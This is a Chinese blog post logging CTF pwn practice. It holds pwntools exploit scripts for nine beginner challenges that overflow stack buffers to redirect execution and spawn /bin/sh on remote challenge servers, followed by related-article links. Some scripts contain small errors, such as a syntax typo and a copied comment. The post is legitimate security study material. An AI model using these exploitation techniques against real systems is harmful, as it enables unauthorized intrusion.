CTF——PWN学习记录

已于 2022-05-07 15:46:41 修改
阅读量2.1k 收藏
点赞数
文章标签: 网络安全
于 2022-04-26 22:51:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60923912/article/details/124439385
版权

Tips:

ubuntu执行属性为executable (application/x-executable)的文件的方法:
1. chmod +x filename 
2. ./filename

file filename #查看文件类型
checksec --file=filename #查看文件的保护
#新建py文件
touch 0.py

简单的模板

from pwn import *
context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')

content = 0
sys_addr = 0x401186
def main():
	if content == 1:
		io = process("./pwn1")
		#打本地的程序
	else:
		io = remote("node4.buuoj.cn",28761)
		#打远程服务器上的程序
	payload = b'a'*(0xF)+p64(sys_addr)
	io.sendline(payload)
	io.interactive()
 
main()#执行main()函数

1、when did you born.

from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 1
def main():
    if content == 1:
        peiqi= = process("1-when_did_you_born")
        #打本地的程序
    else :
        peiqi = remote("220.249.52.133",37645)
        #打远程的程序
    payload = b'a' * (0x20-0x18) + p64(1926)
    #填充垃圾数据+1926的64位编码
    
    peiqi.recvuntil("What's Your Birth?\n")#接收到数据
    peiqi.sendline("1900")#发送我们要发送的数据
    
    peiqi.recvuntil("What's Your Name?\n")
    peiqi.sendline(payload)
    
    peiqi.interactive()
    
main() #执行main函数

2、hello_pwn

from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0
def main():
    if content == 1:
        peiqi = process("2")
        #打本地的程序
    else :
        peiqi = remote("111.200.241.244",64685)
        #打远程的程序
    payload = b'a' * (0x6c-0x68) + p64(1853186401)
    #填充垃圾数据+1926的64位编码
    
    peiqi.recvuntil("lets get helloworld for bof\n")#接收到数据
    peiqi.sendline(payload)
    
    peiqi.interactive()
    
main() #执行main函数

3、level 0

from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0

elf = ELF("0")
system_addr = elf.symbols["callsystem"]#获取地址

def main():
    if content == 1:
        peiqi = process("0")
        #打本地的程序
    else :
        peiqi = remote("111.200.241.244",51297)
        #打远程的程序
    payload = b'a' * (0x80 + 8) + p64(system_addr)
    
    peiqi.recvuntil("Hello, World\n")#接收到数据
    peiqi.sendline(payload)
    
    peiqi.interactive()
    
main() #执行main函数

4、level 2

from pwn import *
context (os='linux',arch="x86",log_level="debug")
content = 0

elf = ELF("2")
system_plt_addr = elf.plt["system"]
bin_sh_addr = next(elf.search(b"/bin/sh"))
#查找bin\sh的地址
def main():
    if content == 1:
        peiqi = process("2")
        #打本地的程序
    else :
        peiqi = remote("111.200.241.244",55628)
        #打远程的程序
    payload = b'a' * (0x88 + 4) + p32(system_plt_addr)
    payload = payload +b"aaaa" + p32(bin_sh_addr)
    peiqi.sendlineafter("Input:\n",payload)#接收到数据
    
    peiqi.interactive()
    
main() #执行main函数

5、guess_num

from platform import libc_ver
from pwn import *
from ctypes import *
context (os='linux',arch="amd64",log_level="debug")
content = 0

def srand():
    lib = cdll.LoadLibrary("libc.so.6")
    lib.srand(1)

    for i in range(10):
       number = str(lib.rand()%6 + 1)
       peiqi.recvuntil("Welcome to a guess number game!")
       peiqi.sendline(number)
       
        
def main():
    global peiqi
    try:
        if content == 1:
            peiqi = process("2")
            #打本地的程序
        else :
            peiqi = remote("111.200.241.244",52742)
            #打远程的程序
    except:
        print("[!!]the exp is content erroe~\n")
    payload = b"a" * (0x30-0x10) + p64(1)
    
    peiqi.recvuntil("Your name:")
    peiqi.sendline(payload)
    srand()
    peiqi.interactive()
    
main() #执行main函数

6、rip

from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0

elf = ELF("pwn1")
system_addr = elf.symbols["fun"]#获取地址

def main():
    if content == 1:
        peiqi = process("pwn1")
        #打本地的程序
    else :
        peiqi = remote("node4.buuoj.cn",29944)
        #打远程的程序
    payload = b'a' * (0x0f-0x00) + p64(system_addr)
    
    peiqi.sendline(payload)
    
    peiqi.interactive()
    
main() #执行main函数

7、guess_num

from pwn import *
context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')

content = 0
sys_addr = 0x401186
def main():
	if content == 1:
		io = process("./pwn1")
		#打本地的程序
	else:
		io = remote("111.200.241.244",57277)
		#打远程服务器上的程序
	payload = b'a'*(0x20)+p64(0)
	io.sendlineafter("Your name:", payload)
	rand = ['2','5','4','2','6','2','5','1','4','2']
	for i in range(10):
		io.sendlineafter("Please input your guess number:",rand[i])
	io.interactive()
 
main()#执行main()函数

8、int_overflow

from pwn import *
#context (os='Linux',arch='amd64',log_level='debug')
context (os='Linux',arch='i386',log_level='debug')
 
content = 0
sys_addr = 0x804868B
def main():
	if content == 1:
		io = process("./pwn1")
		#打本地的程序
	else:
		io = remote("111.200.241.244", 64970)
		#打远程服务器上的程序
	payload = b'a'*(0x18)+p32(sys_addr)
	payload = payload.ljust(262, b'a')
	#将字符串长度补充至(258,263]位
	io.recvuntil("Your choice:")
	io.sendline('1')
	io.recvuntil("username:")
	io.sendline('asd')
	io.recvuntil("passwd:")
	io.sendline(payload)
	io.interactive()
main()#执行main()函数

9、cgpwn2

from pwn import *
#context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
 
elf = ELF('./1')
content = 0
sys_addr = elf.symbols['system']
my_addr = 0x804A080
def main():
	if content == 1:
		io = process("./pwn1")
		#打本地的程序
	else:
		io = remote("111.200.241.244", 61382)
		#打远程服务器上的程序
	payload = b'a'*(0x26+4)+p32(sys_addr)+p32(0)+p32(my_addr)
	io.recv()
	io.sendline('bin/sh\x00')
	io.recv()
	io.sendline(payload)
	io.interactive()
main()#执行main()函数

goodlunatic
关注
36D杯CTF——mengxinstack
qq_33458986的博客
05-08 481
记录一下36D的mengxinstack题目 下载题目,checksec下分析,开启了很多保护,有canary,64位,IDA分析,知道这个程序先执行了一次read,再把read进去的东西print出来,再read,两次read都会造成栈溢出 观察到程序在运行时候(上图)的栈中有__libc_start_main+235的地址,这个地址其实是__libc_start_main的返回地址即__li...
CTF特训营》学习总结——Reverse:逆向分析概述
PICACHU+++的博客
05-29 7231
一、逆向分析的主要方法 逆向分析主要是将二进制机器码进行反汇编得到汇编代码,在汇编代码的基础上,进行功能分析。经过反编译生成的汇编代码中缺失了源代码中的符号、数据结构等信息 ............
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTFpwn的入门指南
热门推荐
菜的只能随便写写博客
09-13 3万+
CTFpwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言...
[Bugku CTF——Pwn] pwn1
Y_peak的博客
03-22 263
[Bugku CTF——Pwn] pwn1 题目地址:https://ctf.bugku.com/ 额, 直接nc连接上,就可以直接得到shell 好水哦,新手玩玩就好,老鸟勿喷 无语凝噎 cat flag就好
【BUUCTF - PWNpwn1_sctf_2016
古月浪子的博客
03-19 4224
checksec一下 找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you,这样的话输入20个 I 就能填满s 找到后门函数 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.lo...
CTF--PWN--作业记录之02-ret2text(仅做个人课程学习作业记录,可能对各位帮助不大)
weixin_43594719的博客
10-15 447
【步骤一】打开XShell后,查看目录,使用cp命令将实验素材拷贝到当前目录中。 【步骤二】使用ls -al命令查看02-second文件夹的权限,没有问题。 【步骤三】切换到02-second的目录下,查看其中的文件的权限,发现文件second的我们没有执行权限。 【步骤四】使用命令chmod +x second给second加上执行权限 【步骤五】使用命令cat second.c查看源代码,分析一下发现此代码在正常情况下永远执行不到haha(),但在haha()中有我们想要执行的语句system
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 432
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
网络安全CTF学习信息汇总
墙角睡大觉的专栏
07-11 3071
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0**********************************************************综合学习平台:http://edu.gooann.com/ 谷安...
pwn1
King
11-17 420
pwn1 1、将程序拖入IDA,找到主函数,按F5查看伪代码 2、程序的执行流程是通过gets()函数输入变量v4,如果变量v5等于440039336819(这是一个字符串,可以选中后,按r键,查看反向的字符串),则执行backdoor()函数 3、进入backdoor()函数,可以发现函数返回了system("/bin/sh") 4、我们想到可以通过覆盖变量的方式来达到控制程序执行流程的目的...
[第五空间2019 决赛]PWN5,checksec
呱呱呱
09-19 953
pwn的一些用法,checksec,gdb的基本调试
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2599
目录 程序基本信息 程序溢出点 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出点 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
CTF-PWN-magic (FILE结构体攻击)
SuperGate的博客
01-29 1118
程序综述 checksec 查看程序保护 supergate@ubuntu:~/Desktop/Pwn$ checksec pwn [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: ...
攻防世界 -pwn1
TedLau的博客
04-22 927
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 683
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2601
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTFPWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
NewStarCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
10-15 1459
第二周题目上难度了,有几题做的比较棘手不会做>_
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 2102
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
学习ctfpwn的网址
最新发布
03-15
当涉及到学习CTF(Capture The Flag)和Pwn(漏洞利用)的时候,以下是一些常用的网址和资源推荐: 1. CTFtime:https://ctftime.org/ - CTFtime是一个CTF竞赛的信息平台,你可以在这里找到各种CTF比赛的信息、题目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goodlunatic

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值